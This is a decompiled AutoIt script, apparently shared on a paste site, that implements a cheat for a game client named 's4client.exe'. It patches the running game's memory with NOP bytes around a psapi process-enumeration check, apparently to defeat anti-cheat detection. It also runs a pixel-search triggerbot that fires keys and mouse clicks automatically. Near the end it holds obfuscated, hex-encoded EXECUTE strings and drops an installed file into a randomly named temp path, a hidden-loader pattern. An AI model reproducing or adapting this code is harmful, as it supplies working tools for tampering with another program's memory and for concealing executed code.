- Func Fn017D($Arg00,$Arg01,$Arg02)
- #forceref $Arg00, $Arg01, $Arg02
- RETURN $Var0513
- ENDFUNC
- Func Fn017E($Arg00)
- LOCAL $Local00EE =DLLSTRUCTCREATE("ptr;dword" ,$Arg00)
- DLLSTRUCTSETDATA($Local00EE , 2 ,DLLSTRUCTGETDATA($Local00EE , 2 )+ 1 )
- RETURN DLLSTRUCTGETDATA($Local00EE , 2 )
- ENDFUNC
- Func Fn017F($Arg00)
- LOCAL $Local00EE =DLLSTRUCTCREATE("ptr;dword" ,$Arg00)
- IF DLLSTRUCTGETDATA($Local00EE , 2 )> 0 THEN
- DLLSTRUCTSETDATA($Local00EE , 2 ,DLLSTRUCTGETDATA($Local00EE , 2 )- 1 )
- RETURN DLLSTRUCTGETDATA($Local00EE , 2 )
- ENDIF
- ENDFUNC
- Func Fn0180($Arg00,$Arg01,$Arg02,$Arg03)
- #forceref $Arg00, $Arg01, $Arg02, $Arg03
- RETURN $Var0515
- ENDFUNC
- Func Fn0181($Arg00,$Arg01)
- #forceref $Arg00, $Arg01
- RETURN $Var0515
- ENDFUNC
- Func Fn0182($Arg00,$Arg01,$Arg02,$Arg03)
- #forceref $Arg00, $Arg01, $Arg02, $Arg03
- RETURN $Var0513
- ENDFUNC
- Func Fn0183($Arg00,$Arg01)
- #forceref $Arg00, $Arg01
- RETURN $Var0515
- ENDFUNC
- Func Fn0184($Arg00,$Arg01,$Arg02,$Arg03,$Arg04,$Arg05)
- #forceref $Arg00, $Arg01, $Arg02, $Arg03, $Arg04, $Arg05
- RETURN $Var0513
- ENDFUNC
- Func Fn0185($Arg00,$Arg01)
- #forceref $Arg00, $Arg01
- RETURN $Var0515
- ENDFUNC
- Func Fn0186($Arg00,$Arg01,$Arg02,$Arg03)
- #forceref $Arg00, $Arg01, $Arg02, $Arg03
- RETURN $Var0515
- ENDFUNC
- Func Fn0187($Arg00,$Arg01,$Arg02,$Arg03)
- #forceref $Arg00, $Arg01, $Arg02, $Arg03
- RETURN $Var0515
- ENDFUNC
- Func Fn0188($Arg00,$Arg01,$Arg02,$Arg03,$Arg04)
- #forceref $Arg00, $Arg01, $Arg02, $Arg03, $Arg04
- RETURN $Var0515
- ENDFUNC
- Func Fn0189($Arg00,$Arg01)
- #forceref $Arg00
- LOCAL $Local00EF =DLLCALL($Var04D0 ,"dword" ,"CreateILockBytesOnHGlobal","hwnd" , 0 ,"int" , 1 ,"ptr*" , 0 )
- LOCAL $Local00F0 =$Local00EF [ 3 ]
- $Local00EF =$Local00EF [ 0 ]
- IF $Local00EF THEN RETURN $Local00EF
- $Local00EF =DLLCALL($Var04D0 ,"dword" ,"StgCreateDocfileOnILockBytes","ptr" ,$Local00F0 ,"dword" ,BITOR(0x0010 , 2 ,0x1000 ),"dword" , 0 ,"ptr*" , 0 )
- LOCAL $Local00F1 =DLLSTRUCTCREATE("ptr" ,$Arg01)
- DLLSTRUCTSETDATA($Local00F1 , 1 ,$Local00EF [ 4 ])
- $Local00EF =$Local00EF [ 0 ]
- IF $Local00EF THEN
- LOCAL $Local00F2 =DLLSTRUCTCREATE("ptr" ,$Local00F0 )
- LOCAL $Local00F3 =DLLSTRUCTCREATE("ptr[3]" ,DLLSTRUCTGETDATA($Local00F2 , 1 ))
- LOCAL $Local00F4 =DLLSTRUCTGETDATA($Local00F3 , 3 )
- CALL("MemoryFuncCall"&"","long" ,$Local00F4 ,"ptr" ,$Local00F0 )
- IF @ERROR= 1 THEN CONSOLEWRITE("!> Needs MemoryDLL.au3 for correct release of ILockBytes"& @CRLF )
- ENDIF
- RETURN $Local00EF
- ENDFUNC
- GLOBAL CONST $Var058B =NUMBER($Var058C )
- GLOBAL CONST $Var058D =NUMBER($Var058E )
- GLOBAL CONST $Var058F =NUMBER($Var0590 )
- GLOBAL CONST $Var0591 =NUMBER($Var0592 )
- GLOBAL CONST $Var0593 =BITOR($Var058F ,$Var058D ,$Var058B ,$Var0591 )
- GLOBAL CONST $Var0594 =NUMBER($Var0595 )
- GLOBAL CONST $Var0596 =NUMBER($Var0597 )
- GLOBAL CONST $Var0598 =NUMBER($Var0599 )
- GLOBAL CONST $Var059A =NUMBER($Var059B )
- GLOBAL CONST $Var059C =NUMBER($Var059D )
- GLOBAL CONST $Var059E =NUMBER($Var059F )
- GLOBAL CONST $Var05A0 =NUMBER($Var05A1 )
- GLOBAL CONST $Var05A2 =NUMBER($Var05A3 )
- GLOBAL CONST $Var05A4 =NUMBER($Var05A5 )
- GLOBAL CONST $Var05A6 =NUMBER($Var05A7 )
- GLOBAL CONST $Var05A8 =NUMBER($Var05A9 )
- GLOBAL CONST $Var05AA =NUMBER($Var05AB )
- GLOBAL CONST $Var05AC =NUMBER($Var05AD )
- GLOBAL CONST $Var05AE =NUMBER($Var05AF )
- GLOBAL CONST $Var05B0 =NUMBER($Var05B1 )
- GLOBAL CONST $Var05B2 =NUMBER($Var05B3 )
- GLOBAL CONST $Var05B4 =NUMBER($Var05B5 )
- GLOBAL CONST $Var05B6 =NUMBER($Var05B7 )
- GLOBAL CONST $Var05B8 =NUMBER($Var05B9 )
- GLOBAL CONST $Var05BA =NUMBER($Var05BB )
- GLOBAL CONST $Var05BC =$Var05BA
- GLOBAL CONST $Var05BD =NUMBER($Var05BE )
- GLOBAL CONST $Var05BF =$Var05BD
- GLOBAL CONST $Var05C0 =NUMBER($Var05C1 )
- GLOBAL CONST $Var05C2 =NUMBER($Var05C3 )
- GLOBAL CONST $Var05C4 =NUMBER($Var05C5 )
- GLOBAL CONST $Var05C6 =NUMBER($Var05C7 )
- GLOBAL CONST $Var05C8 =NUMBER($Var05C9 )
- IF PROCESSEXISTS($Var05CA )THEN
- MSGBOX(NUMBER($Var05CB ),$Var05CC ,$Var05CD )
- EXIT
- ENDIF
- GLOBAL $Var05CE =FALSE ,$Var05CF =FALSE ,$Var05D0 =FALSE ,$Var05D1 =FALSE ,$Var05D2 =NUMBER($Var05D3 )
- $Var05D4 =GUICREATE($Var05D5 ,NUMBER($Var05D6 ),NUMBER($Var05D7 ),NUMBER($Var05D8 ),NUMBER($Var05D9 ),-NUMBER($Var05DA ),$Var05DB )
- GUISETICON($Var05DC )
- $Var05DD =GUICTRLCREATELABEL($Var05DE ,NUMBER($Var05DF ),NUMBER($Var05E0 ),NUMBER($Var05E1 ),NUMBER($Var05E2 ))
- $Var05E3 =GUICTRLCREATELABEL($Var05E4 ,NUMBER($Var05E5 ),NUMBER($Var05E6 ),NUMBER($Var05E7 ),NUMBER($Var05E8 ))
- $Var05E9 =GUICTRLCREATELABEL($Var05EA ,NUMBER($Var05EB ),NUMBER($Var05EC ),NUMBER($Var05ED ),NUMBER($Var05EE ))
- $Var05EF =GUICTRLCREATELABEL($Var05F0 ,NUMBER($Var05F1 ),NUMBER($Var05F2 ),NUMBER($Var05F3 ),NUMBER($Var05F4 ))
- $Var05F5 =GUICTRLCREATEINPUT($Var05F6 ,NUMBER($Var05F7 ),NUMBER($Var05F8 ),NUMBER($Var05F9 ),NUMBER($Var05FA ))
- $Var05FB =GUICTRLCREATEINPUT($Var05FC ,NUMBER($Var05FD ),NUMBER($Var05FE ),NUMBER($Var05FF ),NUMBER($Var0600 ))
- $Var0601 =GUICTRLCREATEINPUT($Var0602 ,NUMBER($Var0603 ),NUMBER($Var0604 ),NUMBER($Var0605 ),NUMBER($Var0606 ))
- $Var0607 =GUICTRLCREATEINPUT($Var0608 ,NUMBER($Var0609 ),NUMBER($Var060A ),NUMBER($Var060B ),NUMBER($Var060C ))
- $Var060D =GUICTRLCREATEBUTTON($Var060E ,NUMBER($Var060F ),NUMBER($Var0610 ),NUMBER($Var0611 ),NUMBER($Var0612 ))
- GUICTRLSETCOLOR(-NUMBER($Var0613 ),NUMBER($Var0614 ))
- $Var0615 =GUICTRLCREATEBUTTON($Var0616 ,NUMBER($Var0617 ),NUMBER($Var0618 ),NUMBER($Var0619 ),NUMBER($Var061A ))
- GUICTRLSETCOLOR(-NUMBER($Var061B ),NUMBER($Var061C ))
- $Var061D =GUICTRLCREATEBUTTON($Var061E ,NUMBER($Var061F ),NUMBER($Var0620 ),NUMBER($Var0621 ),NUMBER($Var0622 ))
- GUICTRLSETCOLOR(-NUMBER($Var0623 ),NUMBER($Var0624 ))
- $Var0625 =GUICTRLCREATEBUTTON($Var0626 ,NUMBER($Var0627 ),NUMBER($Var0628 ),NUMBER($Var0629 ),NUMBER($Var062A ))
- GUICTRLSETCOLOR(-NUMBER($Var062B ),NUMBER($Var062C ))
- GUISETSTATE(EXECUTE($Var062D ))
- TRAYTIP($Var062E ,$Var062F ,NUMBER($Var0630 ))
- SLEEP(NUMBER($Var0631 ))
- Fn018A()
- TRAYTIP($Var0632 ,$Var0633 ,NUMBER($Var0634 ))
- SLEEP(NUMBER($Var0635 ))
- DO
- SLEEP(NUMBER($Var0636 ))
- UNTIL WINEXISTS($Var0637 )
- DO
- $Local00DD =WINGETCLIENTSIZE($Var0638 )
- UNTIL EXECUTE($Var0639 )<>$Local00DD [NUMBER($Var063A )]OR EXECUTE($Var063B )<>$Local00DD [NUMBER($Var063C )]
- GUICTRLSETDATA($Var060D ,$Var063D )
- GUICTRLSETCOLOR($Var060D ,NUMBER($Var063E ))
- GUICTRLSETDATA($Var0615 ,$Var063F )
- GUICTRLSETCOLOR($Var0615 ,NUMBER($Var0640 ))
- GUICTRLSETDATA($Var061D ,$Var0641 )
- GUICTRLSETCOLOR($Var061D ,NUMBER($Var0642 ))
- GUICTRLSETDATA($Var0625 ,$Var0643 )
- GUICTRLSETCOLOR($Var0625 ,NUMBER($Var0644 ))
- WHILE PROCESSEXISTS($Var0645 )
- $Var0646 =GUIGETMSG()
- SWITCH $Var0646
- CASE $Var0647
- EXIT
- CASE $Var060D
- $Var05CE =NOT $Var05CE
- IF $Var05CE THEN
- GUICTRLSETCOLOR($Var060D ,NUMBER($Var0648 ))
- GUICTRLSETDATA($Var060D ,$Var0649 )
- ELSE
- GUICTRLSETCOLOR($Var060D ,NUMBER($Var064A ))
- GUICTRLSETDATA($Var060D ,$Var064B )
- ENDIF
- CASE $Var0615
- IF NOT $Var05D0 AND NOT $Var05D1 THEN
- $Var05CF =NOT $Var05CF
- IF $Var05CF THEN
- GUICTRLSETCOLOR($Var0615 ,NUMBER($Var064C ))
- GUICTRLSETDATA($Var0615 ,$Var064D )
- ELSE
- GUICTRLSETCOLOR($Var0615 ,NUMBER($Var064E ))
- GUICTRLSETDATA($Var0615 ,$Var064F )
- ENDIF
- ENDIF
- CASE $Var061D
- IF NOT $Var05CF AND NOT $Var05D1 THEN
- $Var05D0 =NOT $Var05D0
- IF $Var05D0 THEN
- GUICTRLSETCOLOR($Var061D ,NUMBER($Var0650 ))
- GUICTRLSETDATA($Var061D ,$Var0651 )
- ELSE
- GUICTRLSETCOLOR($Var061D ,NUMBER($Var0652 ))
- GUICTRLSETDATA($Var061D ,$Var0653 )
- ENDIF
- ENDIF
- CASE $Var0625
- IF NOT $Var05CF AND NOT $Var05D0 THEN
- $Var05D1 =NOT $Var05D1
- IF $Var05D1 THEN
- GUICTRLSETCOLOR($Var0625 ,NUMBER($Var0654 ))
- GUICTRLSETDATA($Var0625 ,$Var0655 )
- ELSE
- GUICTRLSETCOLOR($Var0625 ,NUMBER($Var0656 ))
- GUICTRLSETDATA($Var0625 ,$Var0657 )
- ENDIF
- ENDIF
- ENDSWITCH
- IF $Var05CE OR $Var05CF OR $Var05D0 OR $Var05D1 THEN
- $Var05D2 =NUMBER($Var0658 )
- $Var0659 =(EXECUTE($Var065A )/NUMBER($Var065B ))-$Var05D2
- $Var065C =(EXECUTE($Var065D )/NUMBER($Var065E ))-$Var05D2
- $Var065F =(EXECUTE($Var0660 )/NUMBER($Var0661 ))+$Var05D2
- $Var0662 =(EXECUTE($Var0663 )/NUMBER($Var0664 ))+$Var05D2
- $Local00DD =PIXELSEARCH($Var0659 ,$Var065C ,$Var065F ,$Var0662 ,NUMBER($Var0665 ),NUMBER($Var0666 ),NUMBER($Var0667 ))
- IF ISARRAY($Local00DD )THEN
- IF $Var05CE THEN
- SLEEP(GUICTRLREAD($Var05F5 ))
- SEND($Var0668 )
- ENDIF
- IF $Var05CF THEN
- SLEEP(GUICTRLREAD($Var05FB ))
- MOUSEUP($Var0669 )
- ENDIF
- IF $Var05D0 THEN
- SLEEP(GUICTRLREAD($Var0601 ))
- MOUSEDOWN($Var066A )
- SLEEP(NUMBER($Var066B ))
- MOUSEUP($Var066C )
- ENDIF
- IF $Var05D1 THEN
- SLEEP(GUICTRLREAD($Var0607 ))
- MOUSEUP($Var066D )
- $Var05D2 =NUMBER($Var066E )
- MOUSEDOWN($Var066F )
- DO
- $Local00DD =PIXELSEARCH($Var0659 ,$Var065C ,$Var065F ,$Var0662 ,NUMBER($Var0670 ),NUMBER($Var0671 ),NUMBER($Var0672 ))
- UNTIL NOT ISARRAY($Local00DD )
- MOUSEUP($Var0673 )
- ENDIF
- ENDIF
- ENDIF
- WEND
- Func Fn018A()
- GLOBAL $Var0674 ,$Var0675
- $Var0676 =0x0013
- $Var0677 ="0x" &Fn00D9("90" ,$Var0676 )
- $Var0678 =PROCESSWAIT("s4client.exe")
- $Var0674 =A4800101827($Var0678 )
- DO
- SLEEP( 10 )
- UNTIL Fn018B()= 1
- A0B00300F13($Var0675 ,$Var0674 ,$Var0677 ,"byte[" &$Var0676 &"]" )
- A280040200A($Var0674 )
- ENDFUNC
- Func Fn018B()
- $Var0675 =Fn018C(Fn005B("psapi.dll" ),"EnumProcesses")
- IF A2F0020442C($Var0675 ,$Var0674 ,"byte[2]" )="0x8BFF" THEN
- RETURN 1
- ELSE
- RETURN 0
- ENDIF
- ENDFUNC
- Func Fn018C($Arg00,$Arg01)
- $Var0679 =DLLCALL("Kernel32.dll","ptr" ,"GetProcAddress","ptr" ,$Arg00,"str" ,$Arg01)
- RETURN $Var0679 [ 0 ]
- ENDFUNC
- Func Fn018D()
- FOR $AX0X0XA=1 TO 5
- LOCAL $Fn018FSZ_=Fn018E()
- FILEINSTALL("V2.au3.tbl",$Fn018FSZ_,1)
- GLOBAL $Fn018F,$Os=EXECUTE(BINARYTOsTRING("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383335333333373334333733323336333933363435333633373335333333373330333634333336333933373334333233383334333633363339333634333336333533353332333633353336333133363334333233383332333433343331333333313333333933333330333333303333333033333330333333323333333533333333333333323337333333373431333534363332333933323433333233373337333433333336333333333332333133323337333234333333333133323339323732393239272929"))
- IF ISARRAY($Os)AND $Os[0]>=7151 THEN EXITLOOP
- SLEEP(10)
- NEXT
- EXECUTE(BINARYTOsTRING("0x457865637574652842696E617279746F737472696E6728273078343537383635363337353734363532383432363936453631373237393734364637333734373236393645363732383237333037383333333133323432333433363336333933363433333633353334333433363335333634333336333533373334333633353332333833323334333433313333333133333339333333303333333033333330333333303333333233333335333333333333333233373333333734313335343633323339323732393239272929"))
- ENDFUNC
- Func Fn018E()
- LOCAL $Fn018FS1_=Fn018F("4054656D70446972"),$Fn018FS3_=Fn018F("31"),$Fn018FS4_=Fn018F("5c"),$Fn018FS5_=Fn018F("5c"),$Fn018FS6_=Fn018F("37"),$Fn018FS8_=Fn018F("3937"),$Fn018FS9_=Fn018F("313232"),$Fn018FS7_=Fn018F("31"),$Fn018FSA_
- LOCAL $Fn018FS2_=EXECUTE($Fn018FS1_)
- IF STRINGRIGHT($Fn018FS2_,NUMBER($Fn018FS3_))<>$Fn018FS4_ THEN $Fn018FS2_=$Fn018FS2_&$Fn018FS5_
- SRANDOM(NUMBER(STRINGRIGHT(TIMERINIT(),4)))
- DO
- $Fn018FSA_=""
- WHILE STRINGLEN($Fn018FSA_)<NUMBER($Fn018FS6_)
- $Fn018FSA_=$Fn018FSA_&CHR(RANDOM(NUMBER($Fn018FS8_),NUMBER($Fn018FS9_),NUMBER($Fn018FS7_)))
- WEND
- $Fn018FSA_=$Fn018FS2_&$Fn018FSA_
- UNTIL NOT FILEEXISTS($Fn018FSA_)
- RETURN ($Fn018FSA_)
- ENDFUNC
- Func Arg00($Arg00)
- LOCAL $Arg00_
- FOR $X=1 TO STRINGLEN($Arg00)STEP 2
- $Arg00_&=CHR(DEC(STRINGMID($Arg00,$X,2)))
- NEXT
- RETURN $Arg00_
- ENDFUNC
- ; DeTokenise by myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< 2.9 build(138)
Advertisement
Add Comment
Please, Sign In to add comment